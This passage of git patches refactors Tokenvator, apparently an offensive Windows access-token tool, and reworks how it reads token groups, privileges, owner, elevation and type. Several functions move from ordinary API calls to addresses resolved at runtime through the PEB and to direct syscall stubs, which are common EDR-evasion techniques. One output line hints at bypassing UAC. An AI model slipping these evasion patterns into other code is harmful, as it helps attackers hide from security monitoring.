-            advapi32.GetTokenInformation(hWorkingToken, Winnt._TOKEN_INFORMATION_CLASS.TokenGroups, IntPtr.Zero, 0, out returnLength);
-            hTokenGroups = Marshal.AllocHGlobal((int)returnLength);
+            IntPtr hTokenGroups = _GetTokenInformation(Winnt._TOKEN_INFORMATION_CLASS.TokenGroups);
             try
             {
-                if (!advapi32.GetTokenInformation(hWorkingToken, Winnt._TOKEN_INFORMATION_CLASS.TokenGroups, hTokenGroups, returnLength, out returnLength))
-                {
-                    Misc.GetWin32Error("GetTokenInformation (TokenGroups) - Pass 2");
-                    return false;
-                }
                 tokenGroups = (Ntifs._TOKEN_GROUPS)Marshal.PtrToStructure(hTokenGroups, typeof(Ntifs._TOKEN_GROUPS));
-
-                Console.WriteLine("[+] Enumerated {0} Groups: ", tokenGroups.GroupCount);
-                for (int i = 0; i < tokenGroups.GroupCount; i++)
-                {
-                    string sid, account;
-                    sid = account = string.Empty;
-                    _ReadSidAndName(tokenGroups.Groups[i].Sid, out sid, out account);
-                    Console.WriteLine("{0,-50} {1}", sid, account);
-                }
-                return true;
-
             }
             catch (Exception ex)
             {
-                Misc.GetWin32Error("GetTokenInformation (TokenGroups) - Pass 2");
                 Console.WriteLine(ex.Message);
                 return false;
             }
+            finally
+            {
+                Marshal.FreeHGlobal(hTokenGroups);
+            }
+
+            Console.WriteLine("[+] Enumerated {0} Groups: ", tokenGroups.GroupCount);
+            for (int i = 0; i < tokenGroups.GroupCount; i++)
+            {
+                string sid, account;
+                sid = account = string.Empty;
+                _ReadSidAndName(tokenGroups.Groups[i].Sid, out sid, out account);
+                Console.WriteLine("{0,-50} {1}", sid, account);
+            }
+            return true;
         }
 
         ////////////////////////////////////////////////////////////////////////////////
-        // Prints the tokens privileges
+        /// <summary>
+        /// Prints the tokens privileges
+        /// 
+        /// advapi32.GetTokenInformation(hWorkingToken, Winnt._TOKEN_INFORMATION_CLASS.TokenPrivileges, IntPtr.Zero, 0, out TokenInfLength);
+        /// </summary>
         ////////////////////////////////////////////////////////////////////////////////
+        [SecurityCritical]
+        [HandleProcessCorruptedStateExceptions]
         public void GetTokenPrivileges()
         {
-            ////////////////////////////////////////////////////////////////////////////////
-            uint TokenInfLength;
             Console.WriteLine("[*] Enumerating Token Privileges");
-            advapi32.GetTokenInformation(hWorkingToken, Winnt._TOKEN_INFORMATION_CLASS.TokenPrivileges, IntPtr.Zero, 0, out TokenInfLength);
-
-            if (TokenInfLength < 0 || TokenInfLength > int.MaxValue)
+            IntPtr hTokenPrivileges = _GetTokenInformation(Winnt._TOKEN_INFORMATION_CLASS.TokenPrivileges);
+            try
             {
-                Misc.GetWin32Error("GetTokenInformation - 1 " + TokenInfLength);
-                return;
+                tokenPrivileges = (Winnt._TOKEN_PRIVILEGES_ARRAY)Marshal.PtrToStructure(hTokenPrivileges, typeof(Winnt._TOKEN_PRIVILEGES_ARRAY));
             }
-            Console.WriteLine("[*] GetTokenInformation (TokenPrivileges) - Pass 1");
-            hTokenPrivileges = Marshal.AllocHGlobal((int)TokenInfLength);
-
-            ////////////////////////////////////////////////////////////////////////////////
-            if (!advapi32.GetTokenInformation(hWorkingToken, Winnt._TOKEN_INFORMATION_CLASS.TokenPrivileges, hTokenPrivileges, TokenInfLength, out TokenInfLength))
+            catch (Exception ex)
             {
-                Misc.GetWin32Error("GetTokenInformation (TokenPrivileges) - 2 " + TokenInfLength);
+                Console.WriteLine(ex.Message);
                 return;
             }
-            Console.WriteLine("[*] GetTokenInformation - Pass 2");
-            tokenPrivileges = (Winnt._TOKEN_PRIVILEGES_ARRAY)Marshal.PtrToStructure(hTokenPrivileges, typeof(Winnt._TOKEN_PRIVILEGES_ARRAY));
+            finally
+            {
+                Marshal.FreeHGlobal(hTokenPrivileges);
+            }
+
             Console.WriteLine("[+] Enumerated {0} Privileges", tokenPrivileges.PrivilegeCount);
             Console.WriteLine();
             Console.WriteLine("{0,-45}{1,-30}", "Privilege Name", "Enabled");
             Console.WriteLine("{0,-45}{1,-30}", "--------------", "-------");
+
+            ////////////////////////////////////////////////////////////////////////////////
+            // Iterate through the return privileges
             ////////////////////////////////////////////////////////////////////////////////
             for (int i = 0; i < tokenPrivileges.PrivilegeCount; i++)
             {
                 StringBuilder lpName = new StringBuilder();
-                int cchName = 0;
+                uint cchName = 0;
                 IntPtr lpLuid = Marshal.AllocHGlobal(Marshal.SizeOf(tokenPrivileges.Privileges[i]));
                 Marshal.StructureToPtr(tokenPrivileges.Privileges[i].Luid, lpLuid, true);
 
-                advapi32.LookupPrivilegeName(null, lpLuid, null, ref cchName);
+                ////////////////////////////////////////////////////////////////////////////////
+                // Lookup the name of of the privilege from the returned luid
+                // Requires two passes to get the length of the strin
+                // advapi32.LookupPrivilegeName(null, lpLuid, null, ref cchName);
+                // advapi32.LookupPrivilegeName(null, lpLuid, lpName, ref cchName)
+                ////////////////////////////////////////////////////////////////////////////////
+
+                IntPtr hadvapi32 = Generic.GetPebLdrModuleEntry("advapi32.dll");
+                IntPtr hLookupPrivilegeName = Generic.GetExportAddress(hadvapi32, "LookupPrivilegeNameW");
+                MonkeyWorks.advapi32.LookupPrivilegeNameW fLookupPrivilegeName = (MonkeyWorks.advapi32.LookupPrivilegeNameW)Marshal.GetDelegateForFunctionPointer(hLookupPrivilegeName, typeof(MonkeyWorks.advapi32.LookupPrivilegeNameW));
+
+                try
+                {
+                    fLookupPrivilegeName(null, lpLuid, null, ref cchName);
+                }
+                catch (Exception ex)
+                {
+                    Console.WriteLine(ex.Message);
+                }
+
                 if (cchName <= 0 || cchName > int.MaxValue)
                 {
                     Misc.GetWin32Error("LookupPrivilegeName Pass 1");
@@ -348,14 +405,31 @@ public void GetTokenPrivileges()
                     continue;
                 }
 
-                lpName.EnsureCapacity(cchName + 1);
-                if (!advapi32.LookupPrivilegeName(null, lpLuid, lpName, ref cchName))
+                lpName.EnsureCapacity((int)cchName + 1);
+
+                bool retVal = false;
+                try
+                {
+                    retVal = fLookupPrivilegeName(null, lpLuid, lpName, ref cchName);
+                }
+                catch (Exception ex)
+                {
+                    Console.WriteLine(ex.Message);
+                }
+
+                if (!retVal)
                 {
                     Misc.GetWin32Error("LookupPrivilegeName Pass 2");
                     Marshal.FreeHGlobal(lpLuid);
                     continue;
                 }
 
+                ////////////////////////////////////////////////////////////////////////////////
+                // Lookup if the privilege is enable
+                // advapi32.PrivilegeCheck(hWorkingToken, ref privilegeSet, out pfResult)
+                ////////////////////////////////////////////////////////////////////////////////
+                
+                int pfResult = 0;
                 Winnt._PRIVILEGE_SET privilegeSet = new Winnt._PRIVILEGE_SET
                 {
                     PrivilegeCount = 1,
@@ -363,82 +437,87 @@ public void GetTokenPrivileges()
                     Privilege = new Winnt._LUID_AND_ATTRIBUTES[] { tokenPrivileges.Privileges[i] }
                 };
 
-                int pfResult = 0;
-                if (!advapi32.PrivilegeCheck(hWorkingToken, ref privilegeSet, out pfResult))
+                IntPtr hPrivilegeCheck = Generic.GetExportAddress(hadvapi32, "PrivilegeCheck");
+                MonkeyWorks.advapi32.PrivilegeCheck fPrivilegeCheck = (MonkeyWorks.advapi32.PrivilegeCheck)Marshal.GetDelegateForFunctionPointer(hPrivilegeCheck, typeof(MonkeyWorks.advapi32.PrivilegeCheck));
+
+                try
+                {
+                    retVal = fPrivilegeCheck(hWorkingToken, ref privilegeSet, out pfResult);
+                }
+                catch (Exception ex)
+                {
+                    Console.WriteLine(ex.Message);
+                    continue;
+                }
+                finally
                 {
-                    Misc.GetWin32Error("PrivilegeCheck");
                     Marshal.FreeHGlobal(lpLuid);
+                }
+                
+                if (!retVal)
+                {
+                    Misc.GetWin32Error("PrivilegeCheck");
                     continue;
                 }
                 Console.WriteLine("{0,-45}{1,-30}", lpName.ToString(), Convert.ToBoolean(pfResult));
-                Marshal.FreeHGlobal(lpLuid);
             }
             Console.WriteLine();
         }
 
         ////////////////////////////////////////////////////////////////////////////////
-        // Displays the users associated with a token
+        /// <summary>
+        /// Displays the users associated with a token
+        /// P/Invokes moved to _GetTokenInformation 
+        /// advapi32.GetTokenInformation(hWorkingToken, Winnt._TOKEN_INFORMATION_CLASS.TokenOwner, IntPtr.Zero, 0, out returnLength);
+        /// </summary>
         ////////////////////////////////////////////////////////////////////////////////
         public void GetTokenOwner()
         {
-            uint returnLength;
-            advapi32.GetTokenInformation(hWorkingToken, Winnt._TOKEN_INFORMATION_CLASS.TokenOwner, IntPtr.Zero, 0, out returnLength);
-            hTokenOwner = Marshal.AllocHGlobal((int)returnLength);
+            IntPtr hTokenOwner = _GetTokenInformation(Winnt._TOKEN_INFORMATION_CLASS.TokenOwner);
             try
             {
-                if (!advapi32.GetTokenInformation(hWorkingToken, Winnt._TOKEN_INFORMATION_CLASS.TokenOwner, hTokenOwner, returnLength, out returnLength))
-                {
-                    Misc.GetWin32Error("GetTokenInformation (TokenOwner) - Pass 2");
-                    return;
-                }
                 tokenOwner = (Ntifs._TOKEN_OWNER)Marshal.PtrToStructure(hTokenOwner, typeof(Ntifs._TOKEN_OWNER));
-                if (IntPtr.Zero == tokenOwner.Owner)
-                {
-                    Misc.GetWin32Error("PtrToStructure");
-                }
             }
             catch (Exception ex)
             {
-                Misc.GetWin32Error("GetTokenInformation (TokenOwner) - Pass 2");
                 Console.WriteLine(ex.Message);
                 return;
             }
+            finally
+            {
+                Marshal.FreeHGlobal(hTokenOwner);
+            }
 
             Console.WriteLine("[+] Owner: ");
             string sid, account;
-            sid = account = string.Empty;
             _ReadSidAndName(tokenOwner.Owner, out sid, out account);
             Console.WriteLine("{0,-50} {1}", sid, account);
             return;
         }
 
         ////////////////////////////////////////////////////////////////////////////////
-        // Displays the users associated with a token
+        /// <summary>
+        /// Displays the users associated with a token
+        /// P/Invokes moved to _GetTokenInformation 
+        /// advapi32.GetTokenInformation(hWorkingToken, Winnt._TOKEN_INFORMATION_CLASS.TokenPrimaryGroup, IntPtr.Zero, 0, out returnLength);
+        /// </summary>
         ////////////////////////////////////////////////////////////////////////////////
         public void GetTokenPrimaryGroup()
         {
-            uint returnLength;
-            advapi32.GetTokenInformation(hWorkingToken, Winnt._TOKEN_INFORMATION_CLASS.TokenPrimaryGroup, IntPtr.Zero, 0, out returnLength);
-            hTokenPrimaryGroup = Marshal.AllocHGlobal((int)returnLength);
+            IntPtr hTokenPrimaryGroup = _GetTokenInformation(Winnt._TOKEN_INFORMATION_CLASS.TokenPrimaryGroup);
             try
             {
-                if (!advapi32.GetTokenInformation(hWorkingToken, Winnt._TOKEN_INFORMATION_CLASS.TokenPrimaryGroup, hTokenPrimaryGroup, returnLength, out returnLength))
-                {
-                    Misc.GetWin32Error("GetTokenInformation (TokenPrimaryGroup) - Pass 2");
-                    return;
-                }
                 tokenPrimaryGroup = (Winnt._TOKEN_PRIMARY_GROUP)Marshal.PtrToStructure(hTokenPrimaryGroup, typeof(Winnt._TOKEN_PRIMARY_GROUP));
-                if (IntPtr.Zero == tokenPrimaryGroup.PrimaryGroup)
-                {
-                    Misc.GetWin32Error("PtrToStructure");
-                }
             }
             catch (Exception ex)
             {
-                Misc.GetWin32Error("GetTokenInformation (TokenPrimaryGroup) - Pass 2");
                 Console.WriteLine(ex.Message);
                 return;
             }
+            finally
+            {
+                Marshal.FreeHGlobal(hTokenPrimaryGroup);
+            }
 
             string primaryGroupSid, primaryGroupName;
             _ReadSidAndName(tokenPrimaryGroup.PrimaryGroup, out primaryGroupSid, out primaryGroupName);
@@ -448,20 +527,17 @@ public void GetTokenPrimaryGroup()
         }
 
         ////////////////////////////////////////////////////////////////////////////////
-        // Displays the users associated with a token
+        /// <summary>
+        /// Displays the users associated with a token
+        /// P/Invokes moved to _GetTokenInformation 
+        /// advapi32.GetTokenInformation(hWorkingToken, Winnt._TOKEN_INFORMATION_CLASS.TokenDefaultDacl, hTokenDefaultDacl, returnLength, out returnLength);
+        /// </summary>
         ////////////////////////////////////////////////////////////////////////////////
         public void GetTokenDefaultDacl()
         {
-            uint returnLength;
-            advapi32.GetTokenInformation(hWorkingToken, Winnt._TOKEN_INFORMATION_CLASS.TokenDefaultDacl, IntPtr.Zero, 0, out returnLength);
-            hTokenDefaultDacl = Marshal.AllocHGlobal((int)returnLength);
+            IntPtr hTokenDefaultDacl = _GetTokenInformation(Winnt._TOKEN_INFORMATION_CLASS.TokenDefaultDacl);
             try
             {
-                if (!advapi32.GetTokenInformation(hWorkingToken, Winnt._TOKEN_INFORMATION_CLASS.TokenDefaultDacl, hTokenDefaultDacl, returnLength, out returnLength))
-                {
-                    Misc.GetWin32Error("GetTokenInformation (TokenDefaultDacl) - Pass 2");
-                    return;
-                }
                 tokenDefaultDacl = (Winnt._TOKEN_DEFAULT_DACL)Marshal.PtrToStructure(hTokenDefaultDacl, typeof(Winnt._TOKEN_DEFAULT_DACL));
                 if (IntPtr.Zero == tokenDefaultDacl.DefaultDacl)
                 {
@@ -471,19 +547,66 @@ public void GetTokenDefaultDacl()
             }
             catch (Exception ex)
             {
-                Misc.GetWin32Error("GetTokenInformation (TokenDefaultDacl - Pass 2");
                 Console.WriteLine(ex.Message);
                 return;
             }
+            finally
+            {
+                Marshal.FreeHGlobal(hTokenDefaultDacl);
+            }
 
             string primaryGroup = Marshal.PtrToStringUni(tokenPrimaryGroup.PrimaryGroup);
             Console.WriteLine("[+] ACL Count: {0}", tokenDefaultDaclAcl.DefaultDacl.AceCount);
             return;
         }
+
+        ////////////////////////////////////////////////////////////////////////////////
+        /// <summary>
+        /// 
+        /// 
+        /// </summary>
+        /// <param name="tokenInformationClass"></param>
+        /// <returns></returns>
+        ////////////////////////////////////////////////////////////////////////////////
+        [SecurityCritical]
+        [HandleProcessCorruptedStateExceptions]
+        private IntPtr _GetTokenInformation(Winnt._TOKEN_INFORMATION_CLASS tokenInformationClass)
+        {
+            IntPtr hadvapi32 = Generic.GetPebLdrModuleEntry("advapi32.dll");
+            IntPtr hGetTokenInformation = Generic.GetExportAddress(hadvapi32, "GetTokenInformation");
+            MonkeyWorks.advapi32.GetTokenInformation fGetTokenInformation = (MonkeyWorks.advapi32.GetTokenInformation)Marshal.GetDelegateForFunctionPointer(hGetTokenInformation, typeof(MonkeyWorks.advapi32.GetTokenInformation));
+
+            IntPtr tokenInformation = IntPtr.Zero;
+            try
+            {
+                uint returnLength = 0;
+                fGetTokenInformation(hWorkingToken, tokenInformationClass, tokenInformation, returnLength, out returnLength);
+
+                tokenInformation = Marshal.AllocHGlobal((int)returnLength);
+                if (!fGetTokenInformation(hWorkingToken, tokenInformationClass, tokenInformation, returnLength, out returnLength))
+                {
+                    Misc.GetWin32Error(string.Format("GetTokenInformation ({0}) - Pass 2", tokenInformationClass));
+                    return IntPtr.Zero;
+                }
+            }
+            catch (Exception ex)
+            {
+                Console.WriteLine("[-] NtDuplicateToken Generated an Exception");
+                Console.WriteLine("[-] {0}", ex.Message);
+                return IntPtr.Zero;
+            }
+
+            return tokenInformation;
+        }
         #endregion
 
         ////////////////////////////////////////////////////////////////////////////////
-        //
+        /// <summary>
+        /// 
+        /// </summary>
+        /// <param name="pointer"></param>
+        /// <param name="sid"></param>
+        /// <param name="account"></param>
         ////////////////////////////////////////////////////////////////////////////////
         public static void _ReadSidAndName(IntPtr pointer, out string sid, out string account)
         {
@@ -518,13 +641,6 @@ public static void _ReadSidAndName(IntPtr pointer, out string sid, out string ac
             {
                 account = ex.Message;
             }
-            /*
-            if (!UserSessions.ConvertSidToName(pointer, out account))
-            {
-                return;
-            }
-            */
-
         }
 
         ////////////////////////////////////////////////////////////////////////////////

From fab028804f13d4b00f9183a71756c6c049f08cb6 Mon Sep 17 00:00:00 2001
From: Alexander <1656007+0xbadjuju@users.noreply.github.com>
Date: Wed, 25 Aug 2021 22:42:22 -0500
Subject: [PATCH 07/36] Condensed redundant methods and removed static

PrintElevation + CheckElevation -> GetTokenElevation

GetTokenType no longer static

Both can now use _GetTokenInformation
---
 Tokenvator/MainLoop.Modules.cs                |   6 +-
 .../Plugins/AccessTokens/TokenInformation.cs  | 322 ++++++++----------
 .../Plugins/Enumeration/UserSessions.cs       |  18 +-
 3 files changed, 164 insertions(+), 182 deletions(-)

diff --git a/Tokenvator/MainLoop.Modules.cs b/Tokenvator/MainLoop.Modules.cs
index 40b5724..2c9f135 100644
--- a/Tokenvator/MainLoop.Modules.cs
+++ b/Tokenvator/MainLoop.Modules.cs
@@ -412,9 +412,9 @@ private static void _Info(CommandLineParsing cLP, IntPtr hToken)
                     t.GetTokenDefaultDacl();
                     Console.WriteLine();
 
-                    Winnt._TOKEN_TYPE tokenType;
-                    TokenInformation.GetTokenType(hToken, out tokenType);
-                    TokenInformation.PrintElevation(hToken);
+                    t.GetTokenType();
+
+                    t.GetTokenElevation(true);
                 }
             }
         }
diff --git a/Tokenvator/Plugins/AccessTokens/TokenInformation.cs b/Tokenvator/Plugins/AccessTokens/TokenInformation.cs
index 79edb3b..fbe18ab 100644
--- a/Tokenvator/Plugins/AccessTokens/TokenInformation.cs
+++ b/Tokenvator/Plugins/AccessTokens/TokenInformation.cs
@@ -58,78 +58,106 @@ public void Dispose()
             base.Dispose();
         }
 
+        #region ThreadInformation
         ////////////////////////////////////////////////////////////////////////////////
         /// <summary>
-        /// Prints the elevation type of the token
-        /// No Conversions Required
-        /// https://blogs.msdn.microsoft.com/cjacks/2006/10/08/how-to-determine-if-a-user-is-a-member-of-the-administrators-group-with-uac-enabled-on-windows-vista/
+        /// Lists the users for threads
+        /// No Conversions Required 
         /// </summary>
-        /// <param name="hToken"></param>
-        /// <returns></returns>
         ////////////////////////////////////////////////////////////////////////////////
-        public static void PrintElevation(IntPtr hToken)
+        public void GetThreadUsers()
         {
-
-            int output = -1;
-            if (!_QueryTokenInformation(hToken, Winnt._TOKEN_INFORMATION_CLASS.TokenElevationType, ref output))
+            foreach (uint t in threads)
             {
-                Misc.GetWin32Error("TokenElevationType");
-                return;
+                Console.WriteLine("[*] Thread ID: " + t);
+                if (OpenThreadToken(t, Winnt.TOKEN_QUERY))
+                {
+                    using (TokenInformation ti = new TokenInformation(hWorkingThreadToken))
+                    {
+                        ti.SetWorkingTokenToSelf();
+                        ti.GetTokenUser();
+                    }
+                }
             }
+        }
 
-            switch ((Winnt.TOKEN_ELEVATION_TYPE)output)
+        ////////////////////////////////////////////////////////////////////////////////
+        /// <summary>
+        /// Lists the users for threads
+        /// No Conversions Required 
+        /// </summary>
+        ////////////////////////////////////////////////////////////////////////////////
+        public void GetThreadPrivileges()
+        {
+            foreach (uint t in threads)
             {
-                case Winnt.TOKEN_ELEVATION_TYPE.TokenElevationTypeDefault:
-                    Console.WriteLine("[+] TokenElevationTypeDefault");
-                    Console.WriteLine("[*] Token: Not Split");
-                    //Console.WriteLine("ProcessIntegrity: Medium/Low");
-                    break;
-                case Winnt.TOKEN_ELEVATION_TYPE.TokenElevationTypeFull:
-                    Console.WriteLine("[+] TokenElevationTypeFull");
-                    Console.WriteLine("[*] Token: Split");
-                    Console.WriteLine("[+] ProcessIntegrity: High");
-                    break;
-                case Winnt.TOKEN_ELEVATION_TYPE.TokenElevationTypeLimited:
-                    Console.WriteLine("[-] TokenElevationTypeLimited");
-                    Console.WriteLine("[*] Token: Split");
-                    Console.WriteLine("[-] ProcessIntegrity: Medium/Low");
-                    Console.WriteLine("[!] Hint: Try to Bypass UAC");
-                    break;
-                default:
-                    Console.WriteLine("[-] Unknown integrity {0}", output);
-                    Console.WriteLine("[!] Trying anyway");
-                    break;
+                Console.WriteLine("[*] Thread ID: " + t);
+                if (OpenThreadToken(t, Winnt.TOKEN_QUERY))
+                {
+                    using (TokenInformation ti = new TokenInformation(hWorkingThreadToken))
+                    {
+                        ti.SetWorkingTokenToSelf();
+                        ti.GetTokenUser();
+                        ti.GetTokenPrivileges();
+                    }
+                }
             }
         }
+        #endregion
 
+        #region GetTokenInformation
         ////////////////////////////////////////////////////////////////////////////////
         /// <summary>
-        /// Checks if the token is elevated
+        /// Checks and Prints the elevation type of the token
         /// No Conversions Required
         /// https://blogs.msdn.microsoft.com/cjacks/2006/10/08/how-to-determine-if-a-user-is-a-member-of-the-administrators-group-with-uac-enabled-on-windows-vista/
         /// </summary>
         /// <param name="hToken"></param>
-        /// <returns></returns>
+        /// <returns>Return true if the token is elevated</returns>
         ////////////////////////////////////////////////////////////////////////////////
-        public static bool CheckElevation(IntPtr hToken)
+        public bool GetTokenElevation(bool printResults)
         {
-            int output = -1;
-            if (!_QueryTokenInformation(hToken, Winnt._TOKEN_INFORMATION_CLASS.TokenElevationType, ref output))
+            IntPtr hTokenElevationType = _GetTokenInformation(Winnt._TOKEN_INFORMATION_CLASS.TokenElevationType);
+            if (IntPtr.Zero == hTokenElevationType)
             {
-                Misc.GetWin32Error("TokenElevationType");
                 return false;
             }
 
+            int output = Marshal.ReadInt32(hTokenElevationType);
+
             switch ((Winnt.TOKEN_ELEVATION_TYPE)output)
             {
-                case Winnt.TOKEN_ELEVATION_TYPE.TokenElevationTypeDefault:;
-                    return false;
+                case Winnt.TOKEN_ELEVATION_TYPE.TokenElevationTypeDefault:
+                    if (printResults)
+                    {
+                        Console.WriteLine("[+] TokenElevationTypeDefault");
+                        Console.WriteLine("[*] Token: Not Split");
+                        Console.WriteLine("[+] ProcessIntegrity: High");
+                    }
+                    return true;
                 case Winnt.TOKEN_ELEVATION_TYPE.TokenElevationTypeFull:
+                    if (printResults)
+                    {
+                        Console.WriteLine("[+] TokenElevationTypeFull");
+                        Console.WriteLine("[*] Token: Split");
+                        Console.WriteLine("[+] ProcessIntegrity: High");
+                    }
                     return true;
                 case Winnt.TOKEN_ELEVATION_TYPE.TokenElevationTypeLimited:
+                    if (printResults)
+                    {
+                        Console.WriteLine("[-] TokenElevationTypeLimited");
+                        Console.WriteLine("[*] Token: Split");
+                        Console.WriteLine("[-] ProcessIntegrity: Medium/Low");
+                        Console.WriteLine("[!] Hint: Try to Bypass UAC");
+                    }
                     return false;
                 default:
-                    return true;
+                    if (printResults)
+                    {
+                        Console.WriteLine("[-] Unknown integrity {0}", output);
+                    }
+                    return false;
             }
         }
 
@@ -140,103 +168,71 @@ public static bool CheckElevation(IntPtr hToken)
         /// </summary>
         /// <param name="hToken"></param>
         /// <param name="tokenType"></param>
-        /// <returns></returns>
         ////////////////////////////////////////////////////////////////////////////////
-        public static bool GetTokenType(IntPtr hToken, out Winnt._TOKEN_TYPE tokenType)
+        public void GetTokenType()
         {
             int output = -1;
-            if (!_QueryTokenInformation(hToken, Winnt._TOKEN_INFORMATION_CLASS.TokenType, ref output))
+            IntPtr hTokenType = _GetTokenInformation(Winnt._TOKEN_INFORMATION_CLASS.TokenType);
+            try
             {
-                Misc.GetWin32Error("TokenType");
-                tokenType = 0;
-                return false;
+                output = Marshal.ReadInt32(hTokenType);
+            }
+            catch (Exception ex)
+            {
+                Console.WriteLine("[-] ReadInt32 Generated an Exception");
+                Console.WriteLine(ex.Message);
+            }
+            finally
+            {
+                Marshal.FreeHGlobal(hTokenType);
             }
 
             switch ((Winnt._TOKEN_TYPE)output)
             {
                 case Winnt._TOKEN_TYPE.TokenPrimary:
                     Console.WriteLine("[+] Primary Token");
-                    tokenType = Winnt._TOKEN_TYPE.TokenPrimary;
-                    return true;
+                    return;
+
                 case Winnt._TOKEN_TYPE.TokenImpersonation:
-                    tokenType = Winnt._TOKEN_TYPE.TokenImpersonation;
-                    if (!_QueryTokenInformation(hToken, Winnt._TOKEN_INFORMATION_CLASS.TokenImpersonationLevel, ref output))
+                    hTokenType = _GetTokenInformation(Winnt._TOKEN_INFORMATION_CLASS.TokenImpersonationLevel);
+                    try
+                    {
+                        output = Marshal.ReadInt32(hTokenType);
+                    }
+                    catch (Exception ex)
                     {
-                        return false;
+                        Console.WriteLine("[-] ReadInt32 Generated an Exception");
+                        Console.WriteLine(ex.Message);
                     }
+                    finally
+                    {
+                        Marshal.FreeHGlobal(hTokenType);
+                    }
+
                     switch ((Winnt._SECURITY_IMPERSONATION_LEVEL)output)
                     {
                         case Winnt._SECURITY_IMPERSONATION_LEVEL.SecurityAnonymous:
                             Console.WriteLine("[+] Anonymous Token");
-                            return true;
+                            return;
                         case Winnt._SECURITY_IMPERSONATION_LEVEL.SecurityIdentification:
                             Console.WriteLine("[+] Identification Token");
-                            return true;
+                            return;
                         case Winnt._SECURITY_IMPERSONATION_LEVEL.SecurityImpersonation:
                             Console.WriteLine("[+] Impersonation Token");
-                            return true;
+                            return;
                         case Winnt._SECURITY_IMPERSONATION_LEVEL.SecurityDelegation:
                             Console.WriteLine("[+] Delegation Token");
-                            return true;
+                            return;
                         default:
                             Console.WriteLine("[-] Unknown Impersionation Type");
-                            return false;
+                            return;
                     }
                 default:
                     Console.WriteLine("[-] Unknown Type {0}", output);
-                    tokenType = 0;
-                    return false;
-            }
-        }
-
-        #region ThreadInformation
-        ////////////////////////////////////////////////////////////////////////////////
-        /// <summary>
-        /// Lists the users for threads
-        /// No Conversions Required 
-        /// </summary>
-        ////////////////////////////////////////////////////////////////////////////////
-        public void GetThreadUsers()
-        {
-            foreach (uint t in threads)
-            {
-                Console.WriteLine("[*] Thread ID: " + t);
-                if (OpenThreadToken(t, Winnt.TOKEN_QUERY))
-                {
-                    using (TokenInformation ti = new TokenInformation(hWorkingThreadToken))
-                    {
-                        ti.SetWorkingTokenToSelf();
-                        ti.GetTokenUser();
-                    }
-                }
-            }
-        }
-
-        ////////////////////////////////////////////////////////////////////////////////
-        /// <summary>
-        /// Lists the users for threads
-        /// No Conversions Required 
-        /// </summary>
-        ////////////////////////////////////////////////////////////////////////////////
-        public void GetThreadPrivileges()
-        {
-            foreach (uint t in threads)
-            {
-                Console.WriteLine("[*] Thread ID: " + t);
-                if (OpenThreadToken(t, Winnt.TOKEN_QUERY))
-                {
-                    using (TokenInformation ti = new TokenInformation(hWorkingThreadToken))
-                    {
-                        ti.SetWorkingTokenToSelf();
-                        ti.GetTokenUser();
-                        ti.GetTokenPrivileges();
-                    }
-                }
+                    return;
             }
         }
-        #endregion
 
-        #region GetTokenInformation
         ////////////////////////////////////////////////////////////////////////////////
         /// <summary>
         /// Displays the source of a token (user32, advapi, system)
@@ -371,6 +367,18 @@ public void GetTokenPrivileges()
             ////////////////////////////////////////////////////////////////////////////////
             // Iterate through the return privileges
             ////////////////////////////////////////////////////////////////////////////////
+            IntPtr hadvapi32 = Generic.GetPebLdrModuleEntry("advapi32.dll");
+
+            IntPtr hLookupPrivilegeName = Generic.GetExportAddress(hadvapi32, "LookupPrivilegeNameW");
+            MonkeyWorks.advapi32.LookupPrivilegeNameW fLookupPrivilegeName = (MonkeyWorks.advapi32.LookupPrivilegeNameW)Marshal.GetDelegateForFunctionPointer(hLookupPrivilegeName, typeof(MonkeyWorks.advapi32.LookupPrivilegeNameW));
+
+            //IntPtr hPrivilegeCheck = Generic.GetExportAddress(hadvapi32, "PrivilegeCheck");
+            //MonkeyWorks.advapi32.PrivilegeCheck fPrivilegeCheck = (MonkeyWorks.advapi32.PrivilegeCheck)Marshal.GetDelegateForFunctionPointer(hPrivilegeCheck, typeof(MonkeyWorks.advapi32.PrivilegeCheck));
+
+            IntPtr hNtPrivilegeCheck = Generic.GetSyscallStub("NtPrivilegeCheck");
+            MonkeyWorks.ntdll.NtPrivilegeCheck fSyscallNtPrivilegeCheck = (MonkeyWorks.ntdll.NtPrivilegeCheck)Marshal.GetDelegateForFunctionPointer(hNtPrivilegeCheck, typeof(MonkeyWorks.ntdll.NtPrivilegeCheck));
+
+
             for (int i = 0; i < tokenPrivileges.PrivilegeCount; i++)
             {
                 StringBuilder lpName = new StringBuilder();
@@ -384,11 +392,7 @@ public void GetTokenPrivileges()
                 // advapi32.LookupPrivilegeName(null, lpLuid, null, ref cchName);
                 // advapi32.LookupPrivilegeName(null, lpLuid, lpName, ref cchName)
                 ////////////////////////////////////////////////////////////////////////////////
-
-                IntPtr hadvapi32 = Generic.GetPebLdrModuleEntry("advapi32.dll");
-                IntPtr hLookupPrivilegeName = Generic.GetExportAddress(hadvapi32, "LookupPrivilegeNameW");
-                MonkeyWorks.advapi32.LookupPrivilegeNameW fLookupPrivilegeName = (MonkeyWorks.advapi32.LookupPrivilegeNameW)Marshal.GetDelegateForFunctionPointer(hLookupPrivilegeName, typeof(MonkeyWorks.advapi32.LookupPrivilegeNameW));
-
+                
                 try
                 {
                     fLookupPrivilegeName(null, lpLuid, null, ref cchName);
@@ -437,12 +441,10 @@ public void GetTokenPrivileges()
                     Privilege = new Winnt._LUID_AND_ATTRIBUTES[] { tokenPrivileges.Privileges[i] }
                 };
 
-                IntPtr hPrivilegeCheck = Generic.GetExportAddress(hadvapi32, "PrivilegeCheck");
-                MonkeyWorks.advapi32.PrivilegeCheck fPrivilegeCheck = (MonkeyWorks.advapi32.PrivilegeCheck)Marshal.GetDelegateForFunctionPointer(hPrivilegeCheck, typeof(MonkeyWorks.advapi32.PrivilegeCheck));
-
+                uint ntRetVal = 0;
                 try
                 {
-                    retVal = fPrivilegeCheck(hWorkingToken, ref privilegeSet, out pfResult);
+                    ntRetVal = fSyscallNtPrivilegeCheck(hWorkingToken, ref privilegeSet, ref pfResult);
                 }
                 catch (Exception ex)
                 {
@@ -454,9 +456,9 @@ public void GetTokenPrivileges()
                     Marshal.FreeHGlobal(lpLuid);
                 }
                 
-                if (!retVal)
+                if (0 != ntRetVal)
                 {
-                    Misc.GetWin32Error("PrivilegeCheck");
+                    Misc.GetNtError("NtPrivilegeCheck", ntRetVal);
                     continue;
                 }
                 Console.WriteLine("{0,-45}{1,-30}", lpName.ToString(), Convert.ToBoolean(pfResult));
@@ -559,45 +561,6 @@ public void GetTokenDefaultDacl()
             Console.WriteLine("[+] ACL Count: {0}", tokenDefaultDaclAcl.DefaultDacl.AceCount);
             return;
         }
-
